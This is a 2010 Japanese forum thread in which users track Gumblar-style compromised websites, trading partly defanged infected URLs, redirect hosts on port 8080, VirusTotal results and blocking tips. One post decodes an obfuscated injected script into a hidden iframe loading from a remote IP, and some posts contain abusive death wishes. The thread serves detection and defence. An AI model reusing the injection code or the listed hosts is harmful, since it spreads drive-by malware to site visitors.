>>420 そうなんだ。まぁ、ユーザー捕まえるのだけでも
意味あるかもね
>>415 ,417
ん?
JS/Redirector.KA KA.1 KA.2 KA.3
として検出されてますが?
virustotalで検出できない判定食らわされたからって現物のソフトが絶対検出できないって訳じゃない virustotalでの検出可否は参考程度と思っといた方が良い でも安心しちゃダメよ
.cn、.ruの次はどこが標的にされるでしょうね?
まさかの.jp
本家のlv(ラトビア)じゃないか?
Jnewsって編集長がtwitterやってなかったか?
>>431 3〜4連発入ってるやつがいるな
どうやったらこんな連発になるんだか
最近avastスレにここに報告されたアドレスが有用情報として貼られてます。しかもウイルス警告を否定する周到さ 既に2件確認済み
だからどうしろと "今のところ"は対策しとけば感染はしない。セキュ板覗くような人は当然ながらやってるだろ アドレス貼って楽しんでるようなアホは相手にしたら余計に貼るよ
安易にクリックしちゃうという行動もいかがなものかと思われるし そういう人は痛い目見て学習したほうがいいんじゃないの ウイルスサイト貼りを肯定はしないけどさ
2ch内のURLを安易にクリックするなってのはセキュ板じゃなくても基本だろ 基本を忘れちゃいかんよ
(V`д´V)うむ、だからこそ俺様がウィルスURLを踏ませていることはエロイこと! じゃなくて偉いこと!俺様にウィルス踏まされた馬鹿は その経験のおかげでネット上で簡単にURLを踏む事の危険性に気づくってわけだ! (VдV)┌ まぁ本当の馬鹿は何回も引っかかるけどな。 つまり (V`д´V)俺様は反面教師、いや、必要悪を買って出てるってわけさ! そして、それが俺様の人気の秘訣でもあるわけだ(Vд^)−☆ いつもブログに応援ありがとうねみんな!
禿の相手はしないように これ基本な
新潟ライブカメラ でなんかでた。
ここって個人ブログ晒して平気?さっきとあるブログ見てたらガンブラーって言うウィルスをブロックしたってノートン先生が教えてくれた。 だけどガンブラーをチェックするサイトでチェックしても出てこない。自分のPCが悪いの?
直接コード見て確認してからはるもんだろJK
それならソースも見たってことだろ それでないなら無いんじゃないの
ノートンは何を見たんだ
ノートンは誤検出するほど優秀でウイルスバスターは誤検出するザル
更に、ソースネクストはウイルスバスター以下。
ファイアウォールじゃなくてHIPSのテストだろ いい加減気づけよ
(・∀・ )∀・ ) と_,、⌒) )⌒) ) HIPSでーすイエーイ (_ ノノ_ ノノ
454 :
名無しさん@お腹いっぱい。 :2010/03/29(月) 04:57:00
このウィルス踏んじゃったときすぐリカバリしたのに 俺のサイトが改ざんされてた。どゆこと?
踏んだ時にサイトのログインパスを抜かれたから要パス変更
456 :
名無しさん@お腹いっぱい。 :2010/03/29(月) 06:27:40
オートコンプリート切ったらコンプリートされなくなったのでハゲです
>>456 jnewsは直ってる
relaxsizeはまだ感染中
感染してないよ
>>460 今見たら直ってるな
キャッシュの罠か?
IEのアドオンでShockwaveとAdobePDFLinkHelperは無効にしたほうがいいの?
根本がわかってないやつはなにやってもムダ
>>462 分からなかったらとりあえずアンインスコしとけ
どうせ使わんだろその辺
>>461 >つきましては、以下ウィルスの内容や対処方法などを記述します。
ヲイヲイ、バスターで駆除して終わりかよ。
それで済むんなら、サイト閉鎖する必要無いだろうが
>>466 貼ったら貼ったで今度は一般人から非難続出だろうね。
今となってはアップデートすらしない自分の方が過失の度合いは大きいけどね。
469 :
名無しさん@お腹いっぱい。 :2010/03/30(火) 22:02:05
216>> mozilla add-ons の epdfを使っています。軽い。
>>469 アンカーくらいちゃんと打ってください><
470>> は?なにいってんの ちゃんとアンカされてるだろ
特定の専ブラだと安価になるのかね
その専ブラを知りたいね
Janeなら 数字を左クリックで選択反転させ、右クリックすると安価先がPOPされる 安価の>や<はもともとああいう使い方もしたようだが ここは2chなので
475 :
名無しさん@お腹いっぱい。 :2010/03/31(水) 01:48:21
こんな子供だましなウィルスに感染する奴って馬鹿なの?死ぬの?
>>474 > 数字を左クリックで選択反転させ ×
数字を左ダブルクリックで選択反転させ ○
今日JREの更新くるんだっけ
もうきてる ついでにIE8のセキュパッチもきてるぞ
おい、こいつなんとかしてくれ
連日,相当 多数の皆さんが このページの駆除方法で
最低最悪のsecurity toolを駆除され,
再び 元通りにパソコンを使用出来たにも関わらず
ほとんどの皆さんから 何の喜びのメッセージをいただけません。
日本人の大人が,これほど礼儀知らずであったのでしょうか。
困っている場合に 手助けされる時,
お礼を言い合う習慣はなくなったのでしょうか。
私は 因みに 現在 64歳です。
http://8.pro.tok2.com/~miyuki-net-school/index.html
>479 前スレで出てたやつか メールフォームから凸した人がいるが無視されてる 消去方法を削除してて、2000円払ったら教えるって書いてた時期もあった 間違いなく何言っても無駄だと思う
古いかもしれないが、ねっとなんて、昔はサービスの塊のようなものでやっていたもの だと思うがな
金欲しいんだったら情報商材なんだからオークションで売れよw
なんの反応もないのに、なんで駆除できたと分かるんだ?
486 :
名無しさん@お腹いっぱい。 :2010/03/31(水) 11:20:58
>>479 今イロイロ見てたら、このおじちゃん他人のブログやらOKやらで自分の駆除方法書きまくりじゃん。
487 :
名無しさん@お腹いっぱい。 :2010/03/31(水) 11:23:01
そのうちここにも書いてきたりしてなw
人に礼を求める奴にろくなのはいない
私 金澤は 入会した翌日に 2円をゲットしました。 ささやかなお小遣いを希望される方に お奨めします。
まさに老害
>>479 のジジイは偉そうなことを言ってるが、いい歳して自分が無防備である愚かさに気づいてないな・
若干スレチだけど、JREとIE5〜8のアップデート来てます。
>>479 の御老人・・・終わってますな。
ネット上からサイトごと消滅した方がいいと思う。
クリーンインストール前提で、必要なファイルのバックアップを取る為
「とりあえずマトモに動かせるようにする」と言う意味での
security tool削除ならわからなくもないが・・・
本体を殺してないのに「完全駆除」とは片腹痛いw
>>479 前半の日本語の意味が分からない
後半は驚いて何もいえない
>>479 こういうやつはウイルス流してるヤツらと同類だな
謝罪の為に首吊って死ぬべきだ
いや死ぬことすら生ぬるい
【陥落サイトのURL悪用厳禁】 www●weekly-monthly●biz/ 1件だけ投下・・・
498 :
名無しさん@お腹いっぱい。 :2010/03/31(水) 21:47:14
【陥落サイトのURL悪用厳禁】 www●kadaru●mydns●to/ ←これやばくね? www●jc-consulting●jp/ ←絶賛放置中 www●footsal-club●net/
「site:www●kadaru●mydns●to」 www●google●co●jp/search?hl=ja&source=hp&q=site%3Awww●kadaru●mydns●to&btnG=Google+%E6%A4%9C%E7%B4%A2&lr= 先生は絶賛スルー中...
【陥落サイトのURL悪用厳禁】 www●pokebai●net/
505 :
名無しさん@お腹いっぱい。 :2010/04/01(木) 13:25:17
【陥落サイトのURL悪用厳禁】 vip.6to23.com/jogman←ビックリサイトのトップだが感染確認
>>505 "refresh"に5連発
.は●にしてほしいのです・・・
--
【陥落サイトのURL悪用厳禁】
www●ed-shop●com/
・Gumblarっぽいやつ
・<script>c10z27・・・
※めんどくさいから調べてない
ねる...
ちょっと不便になるけどここまで来るとブラウザは常時仮想起動したほうがいいかな
東原さんにガンブラーを話題にしてもらえば・・・
東原ウィルスが拡散すると聞いて
>>508 単純にJavascript切ればいいだけだアホ!
.htaccessなんて表示されないのにどうやって防ぐのかと・・・
リダイレクトを全遮断して、リダイレクト先を確認するようにすればいいだろう。 煩わしさが半端ないから、よほど意志が強くない限りは続けられないと思うが。
>>517 まさにそれやってるけど大して煩わしさ感じない
そんなにリダイレクトしまくりなのか?
520 :
519 :2010/04/01(木) 22:51:30
>>506 297B646F63756D656E742E777269746528756E65736361
7065282027253363253639253636253732253631
253664253635253230253665253631
253664253635253364253633253331
253330253230253733253732253633253364253237253638253734253734253730253361
253266253266253337253337253265253332253332253331
↓
){document.write(unescape( '%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%63%31%30%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%37%37%2e%32%32%31
↓
<iframe name=c10 src='
http://77.221 〜
MSEはGumblarに無力なのか・・・
つか、
>>2 がきちんとできていればGumblarの方が無力なんだよ。
いまグーグルキャッシュでメッセサンオー個人情報流出中で 2ch中が祭り状態だけどこれウイルス? それともメッセの会社としての管理問題? とにかく名前、TEL、メアドと大変だ
489 :名無しさん必死だな:2010/04/02(金) 04:14:02 ID:cjzI0flq0 319 名前: 厚揚げ(関東地方) 投稿日:2010/04/02(金) 03:53:06.39 ID:7g2sF8Sk 購入履歴のページもやばいが、ある語句をつけて検索すると、 会員ごとの個人情報を直接編集する「管理者向けページ」が山のように出てくる。 客から、住所変更の依頼を受けたときなんかに使うページなんだろう。 これをGoogleさまが、ご丁寧に全ページをキャッシュしている。 このページは、会員が自分で決めたパスワードがソースの中に丸出しになってるから、 平文のパスワードが個人情報とセットで流出・・・こりゃ前代未聞の流出事件じゃないか? ていうか大前提として、客が入力した大切なパスワードを、平文で保存しちゃダメだろ。 エログッズの買ったものリスト、住所、氏名、電話、性別、生年月日、 自分で決めたパスワードがセットで流出って、被害甚大すぎるだろ・・・ 被害者は、1秒でも早く、ネットで共通で使っているパスワードを変えるべき。
496 :名無しさん必死だな:2010/04/02(金) 04:16:34 ID:cjzI0flq0
>>489 の続き
さらに、ある文字列で単純にGoogle検索するだけで、
買い物かごシステムの管理者用設定変更ページが、検索結果の1番目に出てくる。
これはシステム上のトップレベルの権限だから、ディレクトリから何まですべての設定が参照できてしまう。
しかも、設定ファイルの置き場所も問題で、会員情報の全員分っぽい大元のCSVファイルと
ロックファイルが、public_htmlの下にまるだしで、URLさえ知ったら誰でもアクセスできる場所に
置いてあるし。いくらなんでも最低レベルだ・・・ザルすぎだろ・・・
俺はアクセスしなかったが、csvは、ちゃんとhtaccessで制限かけてあるんだろうな?
万が一、かけてなかったら・・・いったいどこのテストサイトだよ
ついにCSVファイル直リンURLが来てしまったようですよ
ん、ituneとQuickTimeの更新きてる 一応アップデートしとくか
88個・・・ 狂気だろw
>>536 Foxit Reader 3.2.1.0401で対応
警告ダイアログが出るようになった
メッセサンオーもGumblarにやられたのか・・・
関係ないだろ
現在大学4年で就活中なわけだが、最近は企業の事業紹介サイトもガンブラに侵されてたりするから困る 求人サイトからURLを踏む前にチェック入れるのが手間すぎる
つーかさあ…ガンブラ撒いてるクズは さっさと捕まるか殺されるか自殺しとけよ 捕まったら死刑じゃすまねぇからな
はいw
【陥落サイトのURL悪用厳禁】 www●mog-mmy●com/ www●ichiryuimono●com/ www●cashingalliance●com ←作りかけ放置? ※コードが途中で切れてるけど、いちおう... www●tirashi●jp/ ←再掲載(絶賛放置中) kadaru●mydns●to/tauchi-office/taikensyugi/ ←再掲載(絶賛放置中) ※kadaru●mydns●to/以下が全滅?
【陥落サイトのURL悪用厳禁】 www●babys-b●com/
そういやxreaのユーザー掲示板にwebmaster復活してるんだが 今アドレス送って掲示板に書き込めば403とか対処してくれるかも
>>547 作りかけワロタwww
作者めまたやってくれましたな
ねむい・・・ 【陥落サイトのURL悪用厳禁】 www●okjdr●com/ www●oracle-shop●net/
これもっぽいな www●golazo●jp/
チェッカーのサイト落ちてる?
>>555 情報thxです
最近の傾向についていけてなかったんで自分で見てもわからなかったわ
aguse GWでなぜかyahoo●comのフレームが見えたのがそれのダミーだったんだね
>>557 今の時点(こちらの環境)ではTOPのindexじゃなくて、他のindexが…
例: Last-Modified: Sun, 04 Apr 2010 03:34:43 GMT : i/index.html
c767c●c2>2w1>●61>5_3>●w1w7>8c/_g_o_2>/wicn6●wp6h>pw’.bZ(/[w¥>_6c]/g, ’
↓
77●221●153●178/go2/in●php
>>558 なるほろthxです
<!-- ad -->になごんだ
しかしこっちもaguse GWだと見た目はyahoocomのフレームだね
>>559 jsファイルに弄った跡がなさそうなのとtopのindexにはヤホー米やらなんやらと思ったらaguseでとtopにも
>>523 出たお。。。
バックナンバーのindexにあるのも確認しました トップは拾えないなあ
やっとトップわかった!
/mado/か!
>>561 さんthxですた
面白いのがきましたよ〜 【陥落サイトのURL悪用厳禁】 デジタルアソシエーション株式会社 www●digital-as●co●jp/ \(^o^)/オワタ
> ネットワーク分野においては、ますます重要視されるセキュリティーの問題を含め、 > ネットワークシステムの構築から開発、保守、運用に至るまで確実に進めて参ります。 > 常に、新しい技術を活用するに留まらず、経験あるスペシャリストが業務知識を十分駆使し、 > 課題の本質の調査、分析を徹底的に行うことから、始めます。
digital-as>める凸完了
こんな会社にシステムだのセキュリティだの語ってほしくないというのがみんなの総意だろうwwwww
>>566 凸おつ〜
見に行ったら403 Forbiddenだった
>>568 ぐーぐる先生の「きゃっしゅ」にのこってる・・・
>>569 ついにセキュリティ関連企業までやられましたか
やれやれ
>>564 再感染か修正漏れかしらないけれどダメだこりゃ。
www●digital-as●co●jp/service/index●html
>>571 特に何ともないようだが
しかしトップページには何も告知が無い…さすがに出せないか
>>573 もう修正されてるお。
Last-Modified: Mon, 05 Apr 2010 11:44:28 GMT
575 :
571 :2010/04/05(月) 23:16:41
>>572 いま行ったら消えてた。
「人間性を備えた技術集団」を目指すと、改竄は告知なしのこっそり修正になるのか。
胸が熱くなるな。
まだある Firefoxでwww●digital-as●co●jp/service/index●html ソースの14行目の/shared/openwin.jsをクリック ページをコピペしてvirustotalに投げてみそ
579 :
576 :2010/04/06(火) 01:01:28
>>580 × File www.digital-as.co.jp.openwin.js received on 2010.04.05 08:39:19 (UTC)
○ File www.digital-as.co.jp.openwin.js received on 2010.04.05 16:03:49 (UTC)
相変わらずavastは頑張ってますな ありがたやありがたや
>>584 >>566 さんとは別に漏れもめるぽした時にセキュリティ通信のそのアドレスも含めて送ったお。
toで同時に送ったCPIからは返事きてた。
JPCERT/CCにはccで同時に送ったお。
デジタルアソシエーション 株式会社 にはせめてIPAに自社のホームページが改竄を受けてトロイをばら撒いていたことを自己申告してほしい。
γ⌒ヽ
< ・、,,,;;,) ハ,,..,,ハ
< つ=つ /;;・ω・;;ヽ
ノ ノ三) (;( ^^^ );)
∠、 m)=m) `'ー---‐´
いかんな、もう修正されたしいい加減スルーするとこだけど
>>565 だからなぁ…
>>585 【主な取引先】
NECシステムテクノロジー株式会社
株式会社NTTデータアウラ
株式会社NTTデータ関西
株式会社大阪第一食糧
京セラ コミュニケーションシステム株式会社
スミセイ情報システム株式会社
住友化学システムサービス株式会社
デジタルプロセス株式会社
ニッセイ情報テクノロジー株式会社
日本電話施設株式会社
パナソニックAVCマルチメディアソフト株式会社
株式会社日立システムアンドサービス
株式会社富士通九州システムズ
富士通テン株式会社
富士電機ITセンター株式会社
三井情報株式会社
安川情報システム株式会社
日本アイ・ビー・エム株式会社
みずほ銀行
三井住友銀行
りそな銀行
上記の企業を相手に商売してて「逃げ(告知無し)」がバレたら
倒産フラグ成立間違いなしだろうなw
>>586 どうせ特定派遣で人材出してるだけだろうから
派遣されてるヤツが派遣先で問題起こしたとかじゃなければあんまり影響ないよ。
取引先のWebサイトとかを制作してたとか、
顧客のPCをGumbler攻撃で感染させちゃったとかなら契約切られる可能性もあるが…
銀行系にはそんなずさんな企業と取引があることが 信用不安になるからそれなりに効果ありそうだけどね。
釈明報も掲示しないで隠蔽しようとする会社って…
銀行は単に融資を受けてるだけじゃねw 融資銀行だって取引先に書くだろうし、この程度で信用不安になるなら もっとマスコミが騒ぎ立てるだろ…
【陥落サイトのURL悪用厳禁】 中途半端なコード撤去、再改竄、絶賛放置中とか・・・ posh-e●com/index10●htm pacific-staff●net/ hoikuen●19th●org/ cre2cash●2pg●in/ ←朝日オート(sunrise●2pg●in/)と同じく<!--<script>-->
>>592 コメントアウトとかアホな対応してるな…
> <!--<script>--> これって一応、無効化してるんだ
>>592 醤油みてる最中だけど新型?
> hoikuen●19th●org/
bestdarkstar●info:8080
自己レス 91.121.117.37 gnomeさんとこで確認すた。。。
94.23.159.128になった。 これもgnomeさんとこで確認
>>592 あーーっ!
> hoikuen●19th●org/
http://bestdarkstar ●info:8080/google●com/blogcatalog●com/orbitdownloader●com●php
.info 浸食
599 :
名無しさん@お腹いっぱい。 :2010/04/06(火) 19:43:52
</script><noscript><div style="position:absolute;">
<img width=1 height=1 alt="" src="
http://b3.yahoo.co.jp/b?P= FBGG7XxTw7GuMbELS3k.QhJAeWYvBUu7D_gAAyR9&T=13vm0jrtv%2fX%3d1270
550520%2fE%3d2079744651%2fR%3djp_r25%2fK%3d5%2fV%3d3.1%2fW%3dJ%2fY
%3djp%2fF%3d3785814215%2fQ%3d-1%2fS%3d1%2fJ%3d52C3537C"></div></no
script>
これは?
>>595 かぶった
>>597 いまはこの5個セット
195.160.200.36 GB:AS44949 (GIGACODES)
77.241.93.114 BE:AS34762 (COMBELL)
91.121.117.37 FR:AS16276 (OVH)
91.121.169.6 FR:AS16276 (OVH)
94.23.159.128 FR:AS16276 (OVH)
OVH死ねよ
>>592 sunrise●2pg●inも変わってる
-> snoreflash●ru:8080
2pg●in消えたっぽい?
>>602 ソースアーカイブでけんかった。。。orz....
>>598 .ruドメイン管理厳格化の影響だな
次は.infoか…
>>606 これ、説明として正しいのか?
自分とこの管理用PCが感染して、それでサイト更新しただけだろ?
本当に管理用PCだけが感染してたかはわからんしな 他にもあるんじゃなかろうか まあでも一応不正アクセスではあるんじゃね 広義では、管理者の意図しないアクセス=不正アクセスらしいからな
やはりOS再インストールしろとは書かないのね…
書けないでしょね。。。
>>573-582 あたりの続き
http://www.virustotal.com/analisis/d51b3fc0767a5a66e25a06bbc462e31357516a724f334a96a27982fcec06ce78-1270563397 File www.digital-as.co.jp.openwin.js received on 2010.04.06 14:16:37 (UTC)
Result: 7/38 (18.43%)
Avast 4.8.1351.0 2010.04.06 JS:Illredir-AL
Avast5 5.0.332.0 2010.04.06 JS:Illredir-AL
DrWeb 5.0.2.03300 2010.04.06 JS.Redirector.based.2
GData 19 2010.04.06 JS:Illredir-AL
Kaspersky 7.0.0.125 2010.04.06 Trojan.JS.Redirector.bt
NOD32 5004 2010.04.06 JS/TrojanDownloader.Pegel.AB
Sophos 4.52.0 2010.04.06 Troj/JSRedir-BB
http://www.virustotal.com/analisis/ed0ebd67eb843594cb0b87476e488e1e0fe44c32bc8afd85d2feef157372cf78-1270563154 File www.digital-as.co.jp.index.html received on 2010.04.06 14:12:34 (UTC)
Result: 11/39 (28.21%)
Avast 4.8.1351.0 2010.04.06 JS:Illredir-AL
Avast5 5.0.332.0 2010.04.06 JS:Illredir-AL
BitDefender 7.2 2010.04.06 Trojan.JS.Clicker.ABW
DrWeb 5.0.2.03300 2010.04.06 JS.Redirector.based.2
F-Secure 9.0.15370.0 2010.04.06 Trojan.JS.Clicker.ABW
GData 19 2010.04.06 Trojan.JS.Clicker.ABW
Jiangmin 13.0.900 2010.04.06 Trojan/JS.Pegel.a
Kaspersky 7.0.0.125 2010.04.06 Trojan.JS.Redirector.bt
NOD32 5004 2010.04.06 JS/TrojanDownloader.Pegel.AA
nProtect 2009.1.8.0 2010.04.06 Trojan.Script.397566
Sophos 4.52.0 2010.04.06 Troj/JSRedir-BB
>>610 avast以外のフリー系には期待出来んな
>>612 得手不得手があるよ
Gumblar.xだとAVGがよかったりする。
>>611 はほぼ全滅なぬで国ドメイン(IPアドレス)変えただけでも脅威になるのね。。。
個人的にイパーイ検体出してるけどユーザーじゃないから届いてないかもしれにゃい。。。orz.....
>>613 メールなら関係ないと思う
俺はユーザーだけどメールで検体出してるし、2回ほど返事が来たこともある
まぁavastはめったに返事来ないがな
>>606 >2. 不正アクセスにより改ざんされた対象期間
2010年3月25日(木)6:00 〜 2010年4月5日(月)23:00
>>564 :コテハン ◆8080adndqg :2010/04 /05(月) 14:34:45
ここに投下されて凸られるまで「気づかなかった」としたら最悪だなwww
>>616 1回は検体提出感謝の返事がスペルミス付きで来たw
1回は添付忘れて送ったら、4日後に「添付がねぇ」ってサポートからメール来た
>>617 みんなやっちゃうなぁw
ここんとこパス合ってるけど圧縮ファイル名間違えて送ること数回。
顰蹙買い捲ってそうです><
>>612 スクリプトが検知できないから期待できないと言うのは早漏だろ。
スクリプトを踏んだ時点で検知できればそれに越したことはないが
肝心なのは現物がDLされる前に検知できるかであって
検知できれば結果は同じことだ。
その現物を持っていないから検知できるか知らんけどね。
bestdarkなんとか踏んだ時にJava6アップデート19(ビルド 1.6.0_19-b04)のアイコンがタスクトレイに表示されたんだけど、これ感染してるんでしょうか?
>>2 はやってるはず。adobe readerは半年以上前にアンインストールしてある
重複してるのはぢめて見た・・・
【陥落サイトのURL悪用厳禁】
www●jc-consulting●jp/ ←絶賛放置中
↓
hXXp://bestdarkstar●info:8080/google●com/blogcatalog●com/orbitdownloader●com●php
コードは
>>598 と同じなんだけど・・・
<!--562ba23ffcf28efa4f71fc787258d3d3-->
<!--e62178df1fa90a28d1b2efa8443ab220-->
謎の文字列が謎...
はずじゃなんとも言えませんなあ 心配ならOS入れなおし推奨
このスレで質問しても無駄だぜ 「感染してるかもと思ったんならクリーンインストールしろ!」で終わりだから 実際それが一番確実だろうしな
引き続き*:8080/をブロックでおkかな?
【陥落サイトのURL悪用厳禁】 www●toutyann●com/ ↓ hXXp://snoreflash●ru:8080/360-cn/google●com/thesun●co●uk●php また重複しとる...
>>626 いいんじゃね。
8080全弾きは誤爆するという奴もいるけど、そんな事例見たことないし。
>>625 hXXp://helphomecare●at:8080/ultimate-guitar-com/google●com/livedoor●biz●php
at:8080/もでつか・・・ orz
>>626 *:8080/* ブロックでおk。
巻き込みで阻止られるサイトはURLが悪い(笑)
仮に :8080/ がアドレスに含まれる真っ当なサイトがあったとしても、そのときは一時的に ブロックを解除すればいいだけだしな。
>>631 上: 269, 270
下: 1053, 1054
にそれぞれ<iframe></iframe>があるぜぃ
Avira10premium使ってみたがwebリダイレクトは問答無用でブロック。 offにするにはwebGuardを無効にするしかない。i-frameに対する設定は出来る。 なんでもクリックするヤツには良いかもしれん。
>>631 jde-net●co●jp センセイの診断結果
>このウェブサイトにアクセスするとコンピュータに損害を与える可能性があります。
センセイ激怒中w
>>633 なんでもかんでもクリッコするやつは
パソコンを使わない方がいいと思うw
新コードに絶賛更新中 【陥落サイトのURL悪用厳禁】 fleur●webinfo●jp → loadtube●ru: dog-g-club●com → helphomecare●at: f39●aaa●livedoor●jp/~miyui/archives/cat3/cat10/index●html → helphomecare●at: miyagi●007champagne●biz/asobo → youhelpnow●ru: dxenglish●value-net●net/index●html → bestdarkstar●info: -- 発掘中にみつけた8080じゃないやつ www●bestofunder●com/ ←アクセス注意
8080ではなく懐かしのGumblar.xちゃん moebox●com/main●html たぶんもっと前から改ざんされてたとおもうけど一応貼っとく Last-Modified: Sun, 04 Apr 2010 23:20:30 GMT
でもドメインが新しいのかこれ .irってイランか 初めて見たわ
>>639 追記
aguseのソースをまとめてDLしてくれるの便利だね
/js/table.js や /js/lk.js にてんこ盛りされてて吹いた
ずっと修正されないまま更新され続けてるっぽいなあ 同じURLが連続してるとこから手動ではなく自動っぽいことが伺える まあLast-Modified: も近い時間になってるしね
>>638 注意のURLを踏んでしまったOTZ
とあるインドの”コンピューターの危険にさらされる”サイトに飛ばされた
ちょうしこいて踏むんじゃなかったぉ・・・
www●bestofunder●com/ ↓2ヶ所に飛ばされる zeneey●com/email/znystyle.phpとzeneey●com/は踏んでしまったOTZ nt01●co●in/3 はセクルチーが防いで踏まずに済んだみたい… zeneey●com/は感染サイトだから、今月中にOSの再インストールするぉ!
>>622 > <!--562ba23ffcf28efa4f71fc787258d3d3-->
> <!--e62178df1fa90a28d1b2efa8443ab220-->
> 謎の文字列が謎...
この文字列が有る無しでもセキュリティベンダーによっては検出しない場合があるね。
つか、avast!対応早杉、頑張り過ぎだろw
【陥落サイトのURL悪用厳禁】 www●ferahdondurma●com ← アクセス注意! ※改竄されすぎててよくわからんw neta-script●lionking●jp/ (.at:8080/) 8080系のスクリプトが最大の仕込み? 携帯オンリーで掘るのは厳しいゾ・・・とw
ところでなんでVTのスキャンに使われているカスペってバージョン古いんだ? VTのスキャン結果でカスペがスルーして「ウイルス検出できない!カスペオワタ!」 って言われるのはカスペ信者としては見過ごせないのだが。
面倒くさいからじゃないか?w
>>647 だれうまw
www●e-tokunaga●co●jp/contents/house_dock/index●html
www●vericapandilovska●com●mk/
this●is/ausgot/
at:8080
capvex●com
egujarat●net
info:8080
reagold●com
カスペに蹴られた…ウイルスか?
>>650 >reagold●com
色々仕込んであるというか・・・元のページの面影が無いw
・<!-- ad -->
・Gumblarっぽいやつ
・var I={j・・・
・var Il1I1111I1=function
652 :
名無しさん@お腹いっぱい。 :2010/04/09(金) 20:57:46
www●e-tokunaga●co●jp/pc/free06●html
Javaの実行プログラムが呼ばれてタスクトレイにでてきたんじゃないの
656 :
名無しさん@お腹いっぱい。 :2010/04/10(土) 05:48:47
すみません教えてください 見たいサイトがあってグーグルのキャッシュというところをおして見ようとしたら avastに警告され、キャッシュのURLを入れてチェッカーに掛けたら 外部へリダイレクトされていますと赤字で出ましたが マルウェアが検出されないと出ます。 これってウイルスサイトではないってことですか?
見たかったサイトはur-chintai.infoというところです。
>>657 仮想マシン一台作って見にいってみたけど
403エラーで何も見れません。
心配なら、OSの再インストールを勧めます。
ur-chintai.infoは以前ガンブラーに感染してたんだよ 今はアクセスできない キャッシュは感染してる
すいません、ガンブラーって手動削除可能でしょうか? なんかウィルスバスター起動しなくて、、、
661 :
名無しさん@お腹いっぱい。 :2010/04/10(土) 10:14:53
www●geocities●jp/owari_ka_ra/ www●geocities●jp/o_tweb/ www●geocities●jp/shimilw/
>www●geocities●jp/owari_ka_ra/ 懐かしのCODE1
>>658 >>659 ありがとうございました。感染してたur-chintai.●infoはなくなったのに
キャッシュで感染するんですね・・・
avastでHDD検査して一応ウイルスなかったのですが
カスペでもやって見つかったら再インストールします・・・
>>663 avastが防いでくれたから問題ないだろ
665 :
名無しさん@お腹いっぱい。 :2010/04/10(土) 10:42:06
www●kyoudoumusen●jp
666 :
名無しさん@お腹いっぱい。 :2010/04/10(土) 11:00:03
freett●com/takarafune www●tirashi●jp/ ここも全然対処しない
667 :
名無しさん@お腹いっぱい。 :2010/04/10(土) 11:11:09
ss-gaido●info
ふりちけは存在自体がウイルス(広告的な意味で)
avastスレより partsdepot●jp/
チキンな私のかわりにどなたかよろしく。。 www●gozaisho.co●jp 右下に「やんちゃ爆弾」てのが出ていて、難読化されています。 ググってみたら、やんちゃ爆弾自体はブログパーツのようなんですが、 ロープウェイの公式サイトにこんなオモチャを仕掛けるって、普通の企業なら あり得ないと思うのですが。 そもそも、難読化する必要性がないですよね。他の部分は普通に読める アドレスで貼ってあるのに、openの部分のみ。 既存のものを利用した新たな改竄ってことはないですか? それともこれが普通の形態? 考えてみたら、ブログパーツ部分に仕掛けられたら、危険性認識せずに 押してしまう人はたくさんいそうだ。。
>>670 解読結果
* *
* うそです +
n ∧_∧ n
+ (ヨ(* ´∀`)E)
Y Y *
wwwwww
>>660 無理
セキュリティソフトが起動しない時点でいろいろやられてるってことです
OS入れなおしましょう
>>663 キャッシュなら安全とおもうほうがおかしいよ
単純に考えてコードをそのまま保存するんだから攻撃スクリプトも保存されるでしょ
やっぱavast入れとくか
何使おうがやるべき事やっていれれば今のところは感染のしようもないけどな。
下のURLあやしすぎわろた
680 :
650 :2010/04/10(土) 17:09:46
>>680 管理者氏名がパッと見Gumblarに見えたwww
>>670 ここは鑑定スレではありませぬ。
>>678 下段のURLは8080系の陥落サイト。
easyfunguide●at:8080/
「陥落サイトが増える(かもしれない)」から
遊びで貼るのはやめましょう。
ここで話していいかわからんけどgredのURL入力欄で
http:// ってのいらなくね?
消すのメンドイ
【陥落サイトのURL悪用厳禁】 jyo●eisuku●com/home/ adgaw●com/lovesheet/index●html www●borneomarathon●com/jpn/home●html ←旧型 けんさくわーど:"new String();" "new Date();" "new Array();" -JAVA -JAVAScript site:jp の検索結果 約 160 件 site:cn の検索結果 約 490 件 site:ru の検索結果 約 1,860 件 ←www
お前らなんでこんな詳細にウイルス分析してんだよww セキュリティベンダーに就職しろwww
www■tirashi■jp/ トップはメンテ中になってるが他のページがネット上に残ったまま www■tirashi■jp/tmp/flyer_zooma/ZcyyxafVGp_129/
www■niaufuku■com/sense_up/index■htm 書き込みに失敗しているところが掛ったと思ったら www■niaufuku■com/index■htm 他のページは成功してるらしい。 bag■fukunekodo■com/mindex/ 携帯向けのサイト と思ったらfukunekodo■com/ 上にあるサイトが全部やられてるっぽい wagashi■fukunekodo■com/index/ shochu■fukunekodo■com/index/ nihonshu■fukunekodo■com/index/ sweet■fukunekodo■com/index/ cosme■fukunekodo■com/index/ make■fukunekodo■com/index/ car■fukunekodo■com/index/ mens■fukunekodo■com/index/ pc■fukunekodo■com/index/ baby■fukunekodo■com/index/ diet■fukunekodo■com/index/ たぶん他にもあると思う 失敗? inner■fukunekodo■com/index/ fashion■fukunekodo■com/index/ acces■fukunekodo■com/index/ golf■fukunekodo■com/index/ meet■fukunekodo■com/index/ bekkan■fukunekodo■com/index/ どっちもru:8080
コルコ倒産しろ
>>689 世も末(すえ)な
日本語は正しく使いましょう
マジにネタレスカッコイイ
>>688 fukunekodo●com
絞り込んでみた
ttp://search ●yahoo●co●jp/search?p=site%3Afukunekodo●com%2F+%22function%22&ei=UTF-8&fr=top_ga1_sa&x=wrt
検索結果 約193件(多少の巻き込み有)
>>689 www●collco●jp/
↓巻き込み改竄↓
www●kyoudoumusen●jp/
/(^o^)\やっちまった
・・・ということだなw
>>693 fukunekodoひどいな
コルコはorz×100000000000
695 :
650 :2010/04/11(日) 11:52:00
>>695 www●aparajeyo●org/index●php
avastが反応、JS:Illredir-AL
絶賛崩壊中w
ソース見た限りでは.ru:8080だな
下のアドレスはどこから?
697 :
696 :2010/04/11(日) 12:27:40
と思ったら下にあったのかorz Web Mailって書いてあるから、ポート2095はたぶん関係ないと思う
698 :
650 :2010/04/11(日) 12:38:41
【陥落サイトのURL悪用厳禁】 www●nadara●jp ←途中で切れてる npo-aichi●or●jp/ ← \(^o^)/ creole●jp/ kumarin●biz/
700 :
696 :2010/04/11(日) 14:19:24
npo-aichi 4発(本文3発.js1発)仕込みwww しかし何で途中で切れたりするんだろ
701 :
650 :2010/04/11(日) 14:51:08
